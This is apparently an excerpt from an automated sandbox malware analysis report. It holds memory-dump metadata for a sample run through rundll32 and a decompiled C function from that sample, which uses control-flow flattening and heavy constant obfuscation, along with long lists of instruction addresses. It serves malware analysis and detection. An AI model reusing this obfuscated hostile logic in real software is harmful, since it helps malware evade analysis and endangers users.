                                                                                                                          0x007a641f
                                                                                                                          0x007a6423
                                                                                                                          0x007a6435
                                                                                                                          0x007a6436
                                                                                                                          0x007a643b
                                                                                                                          0x007a643e
                                                                                                                          0x007a63a6
                                                                                                                          0x007a63a8
                                                                                                                          0x00000000
                                                                                                                          0x007a63a8
                                                                                                                          0x007a63d3
                                                                                                                          0x007a63d9
                                                                                                                          0x00000000
                                                                                                                          0x007a63df
                                                                                                                          0x007a63f8
                                                                                                                          0x007a63fd
                                                                                                                          0x007a63ff
                                                                                                                          0x007a6404
                                                                                                                          0x007a640a
                                                                                                                          0x007a63a6
                                                                                                                          0x007a63a8
                                                                                                                          0x00000000
                                                                                                                          0x007a63a8
                                                                                                                          0x007a63a6
                                                                                                                          0x007a6404
                                                                                                                          0x007a63d9
                                                                                                                          0x007a63d1
                                                                                                                          0x007a63c9
                                                                                                                          0x007a63bd
                                                                                                                          0x007a6546
                                                                                                                          0x007a6557
                                                                                                                          0x007a6557
                                                                                                                          0x007a6501
                                                                                                                          0x007a6507
                                                                                                                          0x007a6619
                                                                                                                          0x007a661e
                                                                                                                          0x007a6621
                                                                                                                          0x007a6625
                                                                                                                          0x00000000
                                                                                                                          0x007a650d
                                                                                                                          0x007a650d
                                                                                                                          0x007a6513
                                                                                                                          0x007a6558
                                                                                                                          0x007a6564
                                                                                                                          0x007a656f
                                                                                                                          0x007a657d
                                                                                                                          0x007a65bd
                                                                                                                          0x007a65ca
                                                                                                                          0x007a65ce
                                                                                                                          0x007a65dc
                                                                                                                          0x007a65f1
                                                                                                                          0x007a65f6
                                                                                                                          0x007a65f9
                                                                                                                          0x00000000
                                                                                                                          0x007a6515
                                                                                                                          0x007a6515
                                                                                                                          0x007a651b
                                                                                                                          0x00000000
                                                                                                                          0x007a6521
                                                                                                                          0x007a653e
                                                                                                                          0x007a6543
                                                                                                                          0x007a651b
                                                                                                                          0x007a6513
                                                                                                                          0x00000000
                                                                                                                          0x007a6626
                                                                                                                          0x007a6626
                                                                                                                          0x007a6626
                                                                                                                          0x00000000
                                                                                                                          0x007a6632
                                                                                                                          0x007a63a6

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000009.00000002.447180476.0000000000791000.00000020.00000800.00020000.00000000.sdmp, Offset: 00790000, based on PE: true
                                                                                                                          • Associated: 00000009.00000002.447175867.0000000000790000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          • Associated: 00000009.00000002.447193918.00000000007B3000.00000004.00000800.00020000.00000000.sdmp
                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                          • Snapshot File: hcaresult_9_2_790000_rundll32.jbxd
                                                                                                                          Yara matches
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: $Ym$94$>>$A*$Cu$FjeY$P5$Q]$Rv$T`L5$XQ $d{ $H
                                                                                                                          • API String ID: 0-2231434368
                                                                                                                          • Opcode ID: 2a387ed053208bc1098972dc7a7293500e5b879891e796a2a7164fd670502dc9
                                                                                                                          • Instruction ID: c6bdd4e504a5f6d353bddb18f95a57602242db53a837d79e83adaaa3ad7cab38
                                                                                                                          • Opcode Fuzzy Hash: 2a387ed053208bc1098972dc7a7293500e5b879891e796a2a7164fd670502dc9
                                                                                                                          • Instruction Fuzzy Hash: 65224371508380DFD768CF25C58AA9BFBE2FBC5744F108A1DE29A86260D7B58949CF43
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          C-Code - Quality: 95%
                                                                                                                          			E007A6DF8(void* __ecx) {
                                                                                                                          				char _v524;
                                                                                                                          				char _v1044;
                                                                                                                          				char _v1564;
                                                                                                                          				short _v1568;
                                                                                                                          				short _v1572;
                                                                                                                          				intOrPtr _v1576;
                                                                                                                          				intOrPtr _v1580;
                                                                                                                          				intOrPtr _v1592;
                                                                                                                          				char _v1596;
                                                                                                                          				char _v1600;
                                                                                                                          				signed int _v1604;
                                                                                                                          				signed int _v1608;
                                                                                                                          				signed int _v1612;
                                                                                                                          				signed int _v1616;
                                                                                                                          				signed int _v1620;
                                                                                                                          				signed int _v1624;
                                                                                                                          				signed int _v1628;
                                                                                                                          				signed int _v1632;
                                                                                                                          				signed int _v1636;
                                                                                                                          				signed int _v1640;
                                                                                                                          				signed int _v1644;
                                                                                                                          				signed int _v1648;
                                                                                                                          				signed int _v1652;
                                                                                                                          				signed int _v1656;
                                                                                                                          				signed int _v1660;
                                                                                                                          				signed int _v1664;
                                                                                                                          				signed int _v1668;
                                                                                                                          				signed int _v1672;
                                                                                                                          				signed int _v1676;
                                                                                                                          				signed int _v1680;
                                                                                                                          				signed int _v1684;
                                                                                                                          				signed int _v1688;
                                                                                                                          				signed int _v1692;
                                                                                                                          				signed int _v1696;
                                                                                                                          				signed int _v1700;
                                                                                                                          				signed int _v1704;
                                                                                                                          				signed int _v1708;
                                                                                                                          				signed int _v1712;
                                                                                                                          				signed int _v1716;
                                                                                                                          				signed int _v1720;
                                                                                                                          				signed int _v1724;
                                                                                                                          				signed int _v1728;
                                                                                                                          				signed int _v1732;
                                                                                                                          				signed int _v1736;
                                                                                                                          				signed int _v1740;
                                                                                                                          				signed int _v1744;
                                                                                                                          				signed int _v1748;
                                                                                                                          				signed int _v1752;
                                                                                                                          				signed int _v1756;
                                                                                                                          				signed int _v1760;
                                                                                                                          				signed int _v1764;
                                                                                                                          				signed int _v1768;
                                                                                                                          				signed int _v1772;
                                                                                                                          				signed int _v1776;
                                                                                                                          				signed int _v1780;
                                                                                                                          				signed int _v1784;
                                                                                                                          				signed int _v1788;
                                                                                                                          				signed int _v1792;
                                                                                                                          				signed int _v1796;
                                                                                                                          				signed int _v1800;
                                                                                                                          				signed int _v1804;
                                                                                                                          				signed int _v1808;
                                                                                                                          				signed int _v1812;
                                                                                                                          				signed int _v1816;
                                                                                                                          				signed int _v1820;
                                                                                                                          				signed int _v1824;
                                                                                                                          				signed int _v1828;
                                                                                                                          				signed int _v1832;
                                                                                                                          				signed int _v1836;
                                                                                                                          				signed int _v1840;
                                                                                                                          				signed int _v1844;
                                                                                                                          				void* _t583;
                                                                                                                          				void* _t585;
                                                                                                                          				void* _t592;
                                                                                                                          				void* _t603;
                                                                                                                          				void* _t606;
                                                                                                                          				void* _t609;
                                                                                                                          				signed int _t611;
                                                                                                                          				signed int _t612;
                                                                                                                          				signed int _t613;
                                                                                                                          				signed int _t614;
                                                                                                                          				signed int _t615;
                                                                                                                          				signed int _t616;
                                                                                                                          				signed int _t617;
                                                                                                                          				signed int _t618;
                                                                                                                          				signed int _t619;
                                                                                                                          				void* _t620;
                                                                                                                          				signed int _t674;
                                                                                                                          				char _t675;
                                                                                                                          				void* _t677;
                                                                                                                          				signed int* _t682;
                                                                                                                          
                                                                                                                          				_t682 =  &_v1844;
                                                                                                                          				_v1580 = 0x812dcc;
                                                                                                                          				_v1600 = 0;
                                                                                                                          				_v1572 = 0;
                                                                                                                          				_v1568 = 0;
                                                                                                                          				_v1576 = 0x4b1be1;
                                                                                                                          				_v1604 = 0xb0e9fc;
                                                                                                                          				_v1604 = _v1604 >> 0xe;
                                                                                                                          				_v1604 = _v1604 ^ 0x020002c3;
                                                                                                                          				_v1816 = 0x316963;
                                                                                                                          				_v1816 = _v1816 ^ 0x05c37e76;
                                                                                                                          				_v1816 = _v1816 * 0x44;
                                                                                                                          				_t609 = __ecx;
                                                                                                                          				_v1816 = _v1816 << 6;
                                                                                                                          				_t677 = 0xb42e112;
                                                                                                                          				_v1816 = _v1816 ^ 0x13878f70;
                                                                                                                          				_v1648 = 0xe65aa1;
                                                                                                                          				_v1648 = _v1648 + 0xffffb7c7;
                                                                                                                          				_v1648 = _v1648 ^ 0x00e866e0;
                                                                                                                          				_v1608 = 0x4e6d43;
                                                                                                                          				_v1608 = _v1608 << 3;
                                                                                                                          				_v1608 = _v1608 ^ 0x027e4d7c;
                                                                                                                          				_v1792 = 0x62c447;
                                                                                                                          				_v1792 = _v1792 + 0xfffff9b0;
                                                                                                                          				_v1792 = _v1792 + 0xffff1ab6;
                                                                                                                          				_v1792 = _v1792 ^ 0x5826ec20;
                                                                                                                          				_v1792 = _v1792 ^ 0x58465e47;
                                                                                                                          				_v1616 = 0xd881ce;
                                                                                                                          				_t611 = 0x1c;
                                                                                                                          				_v1616 = _v1616 / _t611;
                                                                                                                          				_v1616 = _v1616 ^ 0x00049a8c;
                                                                                                                          				_v1784 = 0x225701;
                                                                                                                          				_v1784 = _v1784 ^ 0x455f73cc;
                                                                                                                          				_v1784 = _v1784 + 0x2d0b;
                                                                                                                          				_v1784 = _v1784 + 0xffff7069;
                                                                                                                          				_v1784 = _v1784 ^ 0x457ed570;
                                                                                                                          				_v1656 = 0xa0746c;
                                                                                                                          				_v1656 = _v1656 << 5;
                                                                                                                          				_v1656 = _v1656 ^ 0x1405cb88;
                                                                                                                          				_v1756 = 0x86f3a;
                                                                                                                          				_v1756 = _v1756 << 0xf;
                                                                                                                          				_v1756 = _v1756 + 0xffff9aa0;
                                                                                                                          				_v1756 = _v1756 ^ 0x379e88f8;
                                                                                                                          				_v1840 = 0x372205;
                                                                                                                          				_v1840 = _v1840 << 0xb;
                                                                                                                          				_v1840 = _v1840 >> 1;
                                                                                                                          				_t612 = 0x47;
                                                                                                                          				_v1840 = _v1840 * 0x27;
                                                                                                                          				_v1840 = _v1840 ^ 0x18b0e4c5;
                                                                                                                          				_v1720 = 0x55473e;
                                                                                                                          				_v1720 = _v1720 >> 0xe;
                                                                                                                          				_v1720 = _v1720 + 0xffff4222;
                                                                                                                          				_v1720 = _v1720 ^ 0xfff7d1f7;
                                                                                                                          				_v1760 = 0x8a22d4;
                                                                                                                          				_v1760 = _v1760 ^ 0x5338d916;
                                                                                                                          				_v1760 = _v1760 / _t612;
                                                                                                                          				_v1760 = _v1760 ^ 0x01221ec9;
                                                                                                                          				_v1716 = 0x7ad7ec;
                                                                                                                          				_v1716 = _v1716 ^ 0xb2734e10;
                                                                                                                          				_v1716 = _v1716 ^ 0xf628ba0e;
                                                                                                                          				_v1716 = _v1716 ^ 0x44287105;
                                                                                                                          				_v1624 = 0x6426f4;
                                                                                                                          				_v1624 = _v1624 * 0x29;
                                                                                                                          				_v1624 = _v1624 ^ 0x100ef306;
                                                                                                                          				_v1728 = 0x3e505e;
                                                                                                                          				_v1728 = _v1728 >> 8;
                                                                                                                          				_t613 = 0x3a;
                                                                                                                          				_v1728 = _v1728 / _t613;
                                                                                                                          				_v1728 = _v1728 ^ 0x00050efb;
                                                                                                                          				_v1752 = 0x3958e2;
                                                                                                                          				_v1752 = _v1752 ^ 0x62ae6d50;
                                                                                                                          				_v1752 = _v1752 ^ 0x97f7befb;
                                                                                                                          				_v1752 = _v1752 ^ 0xf561088c;
                                                                                                                          				_v1688 = 0xb21a91;
                                                                                                                          				_v1688 = _v1688 ^ 0x7ffc0397;
                                                                                                                          				_v1688 = _v1688 ^ 0x7f439e8f;
                                                                                                                          				_v1620 = 0xd8d2d1;
                                                                                                                          				_v1620 = _v1620 + 0x194e;
                                                                                                                          				_v1620 = _v1620 ^ 0x00d523c5;
                                                                                                                          				_v1696 = 0xa820cb;
                                                                                                                          				_v1696 = _v1696 + 0x8b3c;
                                                                                                                          				_v1696 = _v1696 ^ 0x00a28581;
                                                                                                                          				_v1680 = 0x121bc4;
                                                                                                                          				_t674 = 0x7a;
                                                                                                                          				_v1680 = _v1680 / _t674;
                                                                                                                          				_v1680 = _v1680 ^ 0x0006e996;
                                                                                                                          				_v1744 = 0x9924c6;
                                                                                                                          				_v1744 = _v1744 << 4;
                                                                                                                          				_t614 = 0x11;
                                                                                                                          				_v1744 = _v1744 * 0x36;
                                                                                                                          				_v1744 = _v1744 ^ 0x04d385a1;
                                                                                                                          				_v1632 = 0x653a8;
                                                                                                                          				_v1632 = _v1632 * 0x63;
                                                                                                                          				_v1632 = _v1632 ^ 0x027c9a7f;
                                                                                                                          				_v1672 = 0x158278;
                                                                                                                          				_v1672 = _v1672 + 0xffff088d;
                                                                                                                          				_v1672 = _v1672 ^ 0x001491ab;
                                                                                                                          				_v1832 = 0x486b88;
                                                                                                                          				_v1832 = _v1832 + 0xffff9f3d;
                                                                                                                          				_v1832 = _v1832 >> 3;
                                                                                                                          				_v1832 = _v1832 | 0x023d4c2b;
                                                                                                                          				_v1832 = _v1832 ^ 0x0230cd37;
                                                                                                                          				_v1612 = 0xd2c4ef;
                                                                                                                          				_v1612 = _v1612 * 0x5a;
                                                                                                                          				_v1612 = _v1612 ^ 0x4a177333;
                                                                                                                          				_v1776 = 0x829598;
                                                                                                                          				_v1776 = _v1776 << 0xe;
                                                                                                                          				_v1776 = _v1776 >> 2;
                                                                                                                          				_v1776 = _v1776 | 0x8c8c5501;
                                                                                                                          				_v1776 = _v1776 ^ 0xaddb19b6;
                                                                                                                          				_v1712 = 0x169d18;
                                                                                                                          				_v1712 = _v1712 / _t614;
                                                                                                                          				_v1712 = _v1712 >> 0xa;
                                                                                                                          				_v1712 = _v1712 ^ 0x000c26db;
                                                                                                                          				_v1704 = 0xb2b50;
                                                                                                                          				_v1704 = _v1704 ^ 0x2de07b8f;
                                                                                                                          				_v1704 = _v1704 ^ 0x2de0ad86;
                                                                                                                          				_v1800 = 0x9652d5;
                                                                                                                          				_t615 = 3;
                                                                                                                          				_v1800 = _v1800 * 0x68;
                                                                                                                          				_v1800 = _v1800 / _t615;
                                                                                                                          				_v1800 = _v1800 << 0xa;
                                                                                                                          				_v1800 = _v1800 ^ 0x6cd74e85;
                                                                                                                          				_v1664 = 0x74acab;
                                                                                                                          				_v1664 = _v1664 | 0xe18c4dd2;
                                                                                                                          				_v1664 = _v1664 ^ 0xe1f0b032;
                                                                                                                          				_v1824 = 0x58e83b;
                                                                                                                          				_t616 = 0x2c;
                                                                                                                          				_v1824 = _v1824 * 0x2b;
                                                                                                                          				_v1824 = _v1824 + 0xffff56af;
                                                                                                                          				_v1824 = _v1824 ^ 0x0c61ca29;
                                                                                                                          				_v1824 = _v1824 ^ 0x02809c1e;
                                                                                                                          				_v1764 = 0x974237;
                                                                                                                          				_v1764 = _v1764 << 0xb;
                                                                                                                          				_v1764 = _v1764 * 0x31;
                                                                                                                          				_v1764 = _v1764 ^ 0x9d674e65;
                                                                                                                          				_v1736 = 0xc3f98b;
                                                                                                                          				_v1736 = _v1736 * 0x5e;
                                                                                                                          				_v1736 = _v1736 | 0x641bd8e3;
                                                                                                                          				_v1736 = _v1736 ^ 0x67f85735;
                                                                                                                          				_v1700 = 0xe4f15c;
                                                                                                                          				_v1700 = _v1700 | 0xddaa88b0;
                                                                                                                          				_v1700 = _v1700 ^ 0xdde3c6d3;
                                                                                                                          				_v1844 = 0x9b3502;
                                                                                                                          				_v1844 = _v1844 ^ 0x47d60286;
                                                                                                                          				_v1844 = _v1844 / _t616;
                                                                                                                          				_v1844 = _v1844 ^ 0x0193d551;
                                                                                                                          				_v1640 = 0xffe1b1;
                                                                                                                          				_t617 = 0x39;
                                                                                                                          				_v1640 = _v1640 * 0x7b;
                                                                                                                          				_v1640 = _v1640 ^ 0x7af2e2c5;
                                                                                                                          				_v1808 = 0x2876e6;
                                                                                                                          				_v1808 = _v1808 | 0x109585e0;
                                                                                                                          				_v1808 = _v1808 << 0xd;
                                                                                                                          				_v1808 = _v1808 + 0x9cd3;
                                                                                                                          				_v1808 = _v1808 ^ 0xbefbba98;
                                                                                                                          				_v1676 = 0xd3b2e1;
                                                                                                                          				_v1676 = _v1676 << 0xf;
                                                                                                                          				_v1676 = _v1676 ^ 0xd9748eec;
                                                                                                                          				_v1836 = 0x3e007f;
                                                                                                                          				_v1836 = _v1836 + 0xffffe462;
                                                                                                                          				_v1836 = _v1836 >> 9;
                                                                                                                          				_v1836 = _v1836 >> 6;
                                                                                                                          				_v1836 = _v1836 ^ 0x000afa23;
                                                                                                                          				_v1684 = 0x2c402;
                                                                                                                          				_v1684 = _v1684 >> 0xa;
                                                                                                                          				_v1684 = _v1684 ^ 0x0000130c;
                                                                                                                          				_v1692 = 0x94252b;
                                                                                                                          				_v1692 = _v1692 / _t617;
                                                                                                                          				_v1692 = _v1692 ^ 0x000dcb04;
                                                                                                                          				_v1828 = 0xd5c7f6;
                                                                                                                          				_v1828 = _v1828 * 0x41;
                                                                                                                          				_v1828 = _v1828 + 0x5616;
                                                                                                                          				_v1828 = _v1828 >> 9;
                                                                                                                          				_v1828 = _v1828 ^ 0x001e39c7;
                                                                                                                          				_v1740 = 0xceff06;
                                                                                                                          				_v1740 = _v1740 << 0xe;
                                                                                                                          				_v1740 = _v1740 << 8;
                                                                                                                          				_v1740 = _v1740 ^ 0xc18fb5bb;
                                                                                                                          				_v1748 = 0x414330;
                                                                                                                          				_v1748 = _v1748 * 0x1d;
                                                                                                                          				_v1748 = _v1748 | 0x5a6f0d55;
                                                                                                                          				_v1748 = _v1748 ^ 0x5f6ea92a;
                                                                                                                          				_v1668 = 0xd2b255;
                                                                                                                          				_v1668 = _v1668 ^ 0xc5d7949e;
                                                                                                                          				_v1668 = _v1668 ^ 0xc50ba027;
                                                                                                                          				_v1796 = 0xab825d;
                                                                                                                          				_v1796 = _v1796 << 0xc;
                                                                                                                          				_v1796 = _v1796 + 0xd01b;
                                                                                                                          				_t618 = 0x22;
                                                                                                                          				_v1796 = _v1796 / _t618;
                                                                                                                          				_v1796 = _v1796 ^ 0x056bf222;
                                                                                                                          				_v1724 = 0x6f3f31;
                                                                                                                          				_v1724 = _v1724 + 0x5a62;
                                                                                                                          				_v1724 = _v1724 / _t674;
                                                                                                                          				_v1724 = _v1724 ^ 0x0002d040;
                                                                                                                          				_v1652 = 0x230f16;
                                                                                                                          				_v1652 = _v1652 ^ 0x902061d9;
                                                                                                                          				_v1652 = _v1652 ^ 0x9007a9ef;
                                                                                                                          				_v1804 = 0xb250d0;
                                                                                                                          				_v1804 = _v1804 << 7;
                                                                                                                          				_v1804 = _v1804 << 0xe;
                                                                                                                          				_v1804 = _v1804 >> 0x10;
                                                                                                                          				_v1804 = _v1804 ^ 0x000e0b76;
                                                                                                                          				_v1644 = 0x39b2ec;
                                                                                                                          				_v1644 = _v1644 >> 5;
                                                                                                                          				_v1644 = _v1644 ^ 0x0004ae9a;
                                                                                                                          				_v1708 = 0x41b5f8;
                                                                                                                          				_v1708 = _v1708 << 9;
                                                                                                                          				_v1708 = _v1708 + 0xfffffd74;
                                                                                                                          				_v1708 = _v1708 ^ 0x836650ae;
                                                                                                                          				_v1768 = 0xd924a5;
                                                                                                                          				_t619 = 0x26;
                                                                                                                          				_v1768 = _v1768 * 0x57;
                                                                                                                          				_v1768 = _v1768 >> 4;
                                                                                                                          				_v1768 = _v1768 ^ 0x04932b37;
                                                                                                                          				_v1788 = 0x72a9d;
                                                                                                                          				_v1788 = _v1788 >> 0xb;
                                                                                                                          				_v1788 = _v1788 * 0x3f;
                                                                                                                          				_v1788 = _v1788 + 0xffffc8d5;
                                                                                                                          				_v1788 = _v1788 ^ 0x000eb520;
                                                                                                                          				_v1628 = 0x50edf9;
                                                                                                                          				_v1628 = _v1628 * 0x73;
                                                                                                                          				_v1628 = _v1628 ^ 0x245d5801;
                                                                                                                          				_v1772 = 0x77fe3c;
                                                                                                                          				_v1772 = _v1772 + 0x89a9;
                                                                                                                          				_v1772 = _v1772 | 0x772eb6e7;
                                                                                                                          				_v1772 = _v1772 + 0xffffc435;
                                                                                                                          				_v1772 = _v1772 ^ 0x777a10e8;
                                                                                                                          				_v1780 = 0x481950;
                                                                                                                          				_v1780 = _v1780 >> 0xb;
                                                                                                                          				_v1780 = _v1780 | 0x104efd63;
                                                                                                                          				_v1780 = _v1780 + 0xffffd02c;
                                                                                                                          				_v1780 = _v1780 ^ 0x1043876c;
                                                                                                                          				_v1636 = 0x899427;
                                                                                                                          				_v1636 = _v1636 << 0x10;
                                                                                                                          				_v1636 = _v1636 ^ 0x942ef0bd;
                                                                                                                          				_v1812 = 0xafb495;
                                                                                                                          				_v1812 = _v1812 | 0xf73eef3e;
                                                                                                                          				_v1812 = _v1812 + 0xffffb280;
                                                                                                                          				_v1812 = _v1812 ^ 0xf7b4985a;
                                                                                                                          				_v1732 = 0xe6dab0;
                                                                                                                          				_v1732 = _v1732 + 0x38b;
                                                                                                                          				_v1732 = _v1732 | 0x5f912f35;
                                                                                                                          				_v1732 = _v1732 ^ 0x5ff91c81;
                                                                                                                          				_v1660 = 0xa1ff8d;
                                                                                                                          				_v1660 = _v1660 / _t619;
                                                                                                                          				_v1660 = _v1660 ^ 0x000a69c5;
                                                                                                                          				_v1820 = 0xd15a88;
                                                                                                                          				_v1820 = _v1820 ^ 0xcd50b9e8;
                                                                                                                          				_v1820 = _v1820 >> 0x10;
                                                                                                                          				_v1820 = _v1820 ^ 0xf9319330;
                                                                                                                          				_v1820 = _v1820 ^ 0xf933c487;
                                                                                                                          				_t675 = _v1600;
                                                                                                                          				while(1) {
                                                                                                                          					L1:
                                                                                                                          					while(1) {
                                                                                                                          						L2:
                                                                                                                          						_t620 = 0x424d9d2;
                                                                                                                          						do {
                                                                                                                          							L3:
                                                                                                                          							while(_t677 != 0x19ebf08) {
                                                                                                                          								if(_t677 == _t620) {
                                                                                                                          									_push(_v1600);
                                                                                                                          									_push(_v1808);
                                                                                                                          									_t585 = E007AD389( &_v1564, _v1844, _t620,  &_v1596, _v1640, _t620);
                                                                                                                          									_t682 =  &(_t682[7]);
                                                                                                                          									__eflags = _t585;
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										E007A1E67(_v1676, _v1836, _v1684, _v1692, _v1596);
                                                                                                                          										E007A1E67(_v1828, _v1740, _v1748, _v1668, _v1592);
                                                                                                                          										_t682 =  &(_t682[6]);
                                                                                                                          									}
                                                                                                                          									L14:
                                                                                                                          									_t677 = 0x19ebf08;
                                                                                                                          									while(1) {
                                                                                                                          										L1:
                                                                                                                          										L2:
                                                                                                                          										_t620 = 0x424d9d2;
                                                                                                                          										goto L3;
                                                                                                                          									}
                                                                                                                          								}
                                                                                                                          								if(_t677 == 0x5bc69f5) {
                                                                                                                          									_t592 = E007AD2CE(_t620);
                                                                                                                          									__eflags = _t592 - E00793DE2(_t620);
                                                                                                                          									_t583 = 0x7574965;
                                                                                                                          									_t677 = 0x8166b1d;
                                                                                                                          									_t675 =  !=  ? 0x7574965 : 0x1e8df70;
                                                                                                                          									goto L2;
                                                                                                                          								}
                                                                                                                          								if(_t677 == 0x8166b1d) {
                                                                                                                          									__eflags = _t675 - _t583;
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										_t677 = 0xd369ee2;
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          									_push(_t620);
                                                                                                                          									_push(_t620);
                                                                                                                          									_t606 = E007ABB23( &_v1600, _v1616, _v1784, _v1656, _v1604, _v1756);
                                                                                                                          									_t682 =  &(_t682[6]);
                                                                                                                          									__eflags = _t606;
                                                                                                                          									if(__eflags == 0) {
                                                                                                                          										L12:
                                                                                                                          										return _t606;
                                                                                                                          									}
                                                                                                                          									_t677 = 0xd369ee2;
                                                                                                                          									goto L1;
                                                                                                                          								}
                                                                                                                          								if(_t677 == 0xb42e112) {
                                                                                                                          									_t677 = 0x5bc69f5;
                                                                                                                          									continue;
                                                                                                                          								}
                                                                                                                          								if(_t677 == 0xd369ee2) {
                                                                                                                          									E007ADA22(_v1840, _v1720, __eflags, _v1760,  &_v1044, _t620, _v1716);
                                                                                                                          									 *((short*)(E0079B6CF( &_v1044, _v1624, _v1728, _v1752))) = 0;
                                                                                                                          									E00798969(_v1688,  &_v524, __eflags, _v1620, _v1696);
                                                                                                                          									_push(_v1632);
                                                                                                                          									_push(_v1744);
                                                                                                                          									E007947CE( &_v1044, _v1672, _v1680, _v1832, _v1612, E007ADCF7(_v1680, 0x791328, __eflags),  &_v524, _v1776, _v1712);
                                                                                                                          									E0079A8B0(_v1704, _t598, _v1800);
                                                                                                                          									_t603 = E0079EA99(_v1664, _t609, _v1824, _v1764,  &_v1564, _v1736);
                                                                                                                          									_t682 =  &(_t682[0x17]);
                                                                                                                          									__eflags = _t603;
                                                                                                                          									if(__eflags != 0) {
                                                                                                                          										_t583 = 0x7574965;
                                                                                                                          										__eflags = _t675 - 0x7574965;
                                                                                                                          										_t620 = 0x424d9d2;
                                                                                                                          										_t677 =  ==  ? 0x424d9d2 : 0xe2e667c;
                                                                                                                          										continue;
                                                                                                                          									}
                                                                                                                          									goto L14;
                                                                                                                          								}
                                                                                                                          								_t696 = _t677 - 0xe2e667c;
                                                                                                                          								if(_t677 != 0xe2e667c) {
                                                                                                                          									goto L25;
                                                                                                                          								}
                                                                                                                          								_push(_v1804);
                                                                                                                          								_push( &_v1564);
                                                                                                                          								_push(_t620);
                                                                                                                          								_push(0);
                                                                                                                          								_push( &_v1596);
                                                                                                                          								_push(_v1652);
                                                                                                                          								_push(0);
                                                                                                                          								_t606 = E0079AB87(_v1796, _v1724, _t696);
                                                                                                                          								if(_t606 == 0) {
                                                                                                                          									goto L12;
                                                                                                                          								}
                                                                                                                          								E007A1E67(_v1644, _v1708, _v1768, _v1788, _v1596);
                                                                                                                          								return E007A1E67(_v1628, _v1772, _v1780, _v1636, _v1592);
                                                                                                                          							}
                                                                                                                          							E007A1E67(_v1812, _v1732, _v1660, _v1820, _v1600);
                                                                                                                          							_t682 =  &(_t682[3]);
                                                                                                                          							_t677 = 0xe6feec1;
                                                                                                                          							_t583 = 0x7574965;
                                                                                                                          							_t620 = 0x424d9d2;
                                                                                                                          							L25:
                                                                                                                          							__eflags = _t677 - 0xe6feec1;
                                                                                                                          						} while (__eflags != 0);
                                                                                                                          						return _t583;
                                                                                                                          					}
                                                                                                                          				}
                                                                                                                          			}






























































































                                                                                                                          0x007a7002
                                                                                                                          0x007a700d
                                                                                                                          0x007a7020
                                                                                                                          0x007a7027
                                                                                                                          0x007a7032
                                                                                                                          0x007a703d
                                                                                                                          0x007a7050
                                                                                                                          0x007a7055
                                                                                                                          0x007a705e
                                                                                                                          0x007a7069
                                                                                                                          0x007a7071
                                                                                                                          0x007a7079
                                                                                                                          0x007a7081
                                                                                                                          0x007a7089
                                                                                                                          0x007a7094
                                                                                                                          0x007a709f
                                                                                                                          0x007a70aa
                                                                                                                          0x007a70b5
                                                                                                                          0x007a70c0
                                                                                                                          0x007a70cb
                                                                                                                          0x007a70d6
                                                                                                                          0x007a70e1
                                                                                                                          0x007a70ec
                                                                                                                          0x007a70fe
                                                                                                                          0x007a7103
                                                                                                                          0x007a710c
                                                                                                                          0x007a7117
                                                                                                                          0x007a711f
                                                                                                                          0x007a7129
                                                                                                                          0x007a712c
                                                                                                                          0x007a7130
                                                                                                                          0x007a7138
                                                                                                                          0x007a714b
                                                                                                                          0x007a7152
                                                                                                                          0x007a715d
                                                                                                                          0x007a7168
                                                                                                                          0x007a7173
                                                                                                                          0x007a717e
                                                                                                                          0x007a7186
                                                                                                                          0x007a718e
                                                                                                                          0x007a7193
                                                                                                                          0x007a719b
                                                                                                                          0x007a71a3
                                                                                                                          0x007a71b6
                                                                                                                          0x007a71bd
                                                                                                                          0x007a71c8
                                                                                                                          0x007a71d0
                                                                                                                          0x007a71d5
                                                                                                                          0x007a71da
                                                                                                                          0x007a71e2
                                                                                                                          0x007a71ea
                                                                                                                          0x007a7200
                                                                                                                          0x007a7207
                                                                                                                          0x007a720f
                                                                                                                          0x007a721a
                                                                                                                          0x007a7225
                                                                                                                          0x007a7230
                                                                                                                          0x007a723b
                                                                                                                          0x007a7248
                                                                                                                          0x007a7249
                                                                                                                          0x007a7253
                                                                                                                          0x007a7257
                                                                                                                          0x007a725c
                                                                                                                          0x007a7264
                                                                                                                          0x007a726f
                                                                                                                          0x007a727a
                                                                                                                          0x007a7285
                                                                                                                          0x007a7296
                                                                                                                          0x007a7299
                                                                                                                          0x007a729d
                                                                                                                          0x007a72a5
                                                                                                                          0x007a72ad
                                                                                                                          0x007a72b5
                                                                                                                          0x007a72bd
                                                                                                                          0x007a72c7
                                                                                                                          0x007a72cb
                                                                                                                          0x007a72d3
                                                                                                                          0x007a72e6
                                                                                                                          0x007a72ed
                                                                                                                          0x007a72f8
                                                                                                                          0x007a7303
                                                                                                                          0x007a730e
                                                                                                                          0x007a7319
                                                                                                                          0x007a7324
                                                                                                                          0x007a732c
                                                                                                                          0x007a7344
                                                                                                                          0x007a7348
                                                                                                                          0x007a7350
                                                                                                                          0x007a7363
                                                                                                                          0x007a7366
                                                                                                                          0x007a736d
                                                                                                                          0x007a7378
                                                                                                                          0x007a7380
                                                                                                                          0x007a7388
                                                                                                                          0x007a738d
                                                                                                                          0x007a7395
                                                                                                                          0x007a739d
                                                                                                                          0x007a73a8
                                                                                                                          0x007a73b0
                                                                                                                          0x007a73bb
                                                                                                                          0x007a73c3
                                                                                                                          0x007a73cb
                                                                                                                          0x007a73d0
                                                                                                                          0x007a73d5
                                                                                                                          0x007a73dd
                                                                                                                          0x007a73e8
                                                                                                                          0x007a73f0
                                                                                                                          0x007a73fb
                                                                                                                          0x007a740f
                                                                                                                          0x007a7416
                                                                                                                          0x007a7421
                                                                                                                          0x007a742e
                                                                                                                          0x007a7432
                                                                                                                          0x007a743a
                                                                                                                          0x007a743f
                                                                                                                          0x007a7447
                                                                                                                          0x007a744f
                                                                                                                          0x007a7454
                                                                                                                          0x007a7459
                                                                                                                          0x007a7461
                                                                                                                          0x007a746e
                                                                                                                          0x007a7472
                                                                                                                          0x007a747a
                                                                                                                          0x007a7482
                                                                                                                          0x007a748d
                                                                                                                          0x007a7498
                                                                                                                          0x007a74a3
                                                                                                                          0x007a74ab
                                                                                                                          0x007a74b0
                                                                                                                          0x007a74be
                                                                                                                          0x007a74c8
                                                                                                                          0x007a74cc
